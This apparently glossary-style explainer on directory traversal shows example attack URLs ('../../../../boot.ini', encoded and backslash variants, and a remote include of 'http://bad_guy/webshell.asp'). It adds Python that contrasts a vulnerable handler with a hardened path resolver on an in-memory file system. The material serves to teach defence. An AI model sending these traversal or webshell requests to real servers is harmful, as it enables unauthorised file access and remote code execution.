Directory Traversal

A directory traversal, sometimes called path traversal, is an attack in which the attacker attempts to access files outside of the web root directory. When the server is vulnerable to directory traversal it can give the attacker broad access to the server, allowing not only the ability to read the contents of files but also, depending on what they can reach, the ability to run arbitrary commands.

Basic Example

http://vulnerable_site.com/get_file.asp?file=file.pdf

If vulnerable_site.com were vulnerable to directory traversal, and the attacker wanted the boot.ini file in C:\, they could theoretically request:

http://vulnerable_site.com/get_file.asp?file=../../../../boot.ini

This becomes much more dangerous when the attacker is able to reach binaries that can run code, or when the file parameter accepts content from outside sources, such as a remote URL.

http://vulnerable_site.com/get_file.asp?file=http://bad_guy/webshell.asp
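As an added example that is not part of this glossary entry, the Python below mimics the flawed get_file.asp pattern (decode the parameter, join it to the web root, open the result) beside a hardened resolver that decodes once, rejects remote references, normalises the path and verifies that it still lies inside the web root. The web root, the in-memory file system and the function names are all constructed for illustration; nothing on the real disk is read.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed example: a web root and a fake file system kept in memory,
# so nothing on the real disk is read. Paths are POSIX-style on purpose
# so the check behaves the same on every host.
WEB_ROOT = "/var/www/files"
FAKE_FS = {
    "/var/www/files/file.pdf": b"%PDF-1.4 constructed sample",
    "/boot.ini": b"[boot loader]",  # outside the web root: must never be served
}


class TraversalError(ValueError):
    """Raised when a requested path would leave the web root."""


def get_file_vulnerable(file_param: str):
    """Mirrors the flawed get_file.asp pattern: decode, join, open.
    Any '../' sequence in the parameter walks out of WEB_ROOT."""
    path = posixpath.normpath(posixpath.join(WEB_ROOT, unquote(file_param)))
    return FAKE_FS.get(path)


def safe_path(file_param: str, web_root: str = WEB_ROOT) -> str:
    """Resolve file_param under web_root, or raise TraversalError."""
    raw = unquote(file_param)  # decode exactly once, before any checks
    # A scheme prefix (http://, ftp://, ...) is a remote reference, never a local file.
    if re.match(r"^[A-Za-z][A-Za-z0-9+.-]*://", raw):
        raise TraversalError("remote reference rejected")
    if "\x00" in raw:
        raise TraversalError("NUL byte in path")
    raw = raw.replace("\\", "/")  # Windows-style ..\..\ is traversal too
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, raw))
    # After normalisation the result must still sit inside the root.
    if candidate != root and not candidate.startswith(root + "/"):
        raise TraversalError("path escapes web root: %s" % candidate)
    return candidate


def get_file_hardened(file_param: str):
    """Serve a file only if safe_path accepts the request."""
    return FAKE_FS.get(safe_path(file_param))


def is_allowed(file_param: str) -> bool:
    """True when the hardened resolver would serve the request."""
    try:
        safe_path(file_param)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    probes = [
        "file.pdf",
        "../../../../boot.ini",
        "..%2F..%2F..%2F..%2Fboot.ini",
        "..\\..\\..\\..\\boot.ini",
        "http://bad_guy/webshell.asp",
    ]
    for p in probes:
        print(f"{p!r:36} vulnerable={get_file_vulnerable(p)!r:32} allowed={is_allowed(p)}")
```

Running the block shows the vulnerable handler returning the contents of /boot.ini for the `../../../../boot.ini` request while the hardened resolver refuses it, along with the URL-encoded and backslash variants and the remote webshell reference. On a real file system, resolve with `os.path.realpath` and compare against the realpath of the web root as well, so that a symbolic link inside the root cannot point back outside it.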
